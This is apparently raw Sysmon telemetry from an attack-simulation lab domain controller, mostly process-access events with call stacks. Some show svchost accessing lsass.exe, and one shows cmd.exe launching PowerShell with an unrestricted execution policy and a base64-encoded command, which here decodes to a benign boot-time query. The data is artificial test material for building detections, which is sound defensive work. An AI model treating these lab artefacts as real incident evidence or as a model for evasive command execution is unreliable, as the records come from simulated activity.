13:08:50.399{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.399{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.371{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_x3dn0fqi.tpj.ps12021-01-14 13:08:50.371 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.371{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.340{08A6967A-4262-6000-EA02-000000009901}41283532C:\Windows\system32\conhost.exe{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.340{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.340{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.340{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.340{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-4262-6000-EB02-000000009901}12484932C:\Windows\system32\cmd.exe{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.338{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4262-6000-E7E0-110000000000}0x11e0e70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4262-6000-EB02-000000009901}1248C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-4262-6000-EA02-000000009901}41283532C:\Windows\system32\conhost.exe{08A6967A-4262-6000-EB02-000000009901}1248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4262-6000-EB02-000000009901}1248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 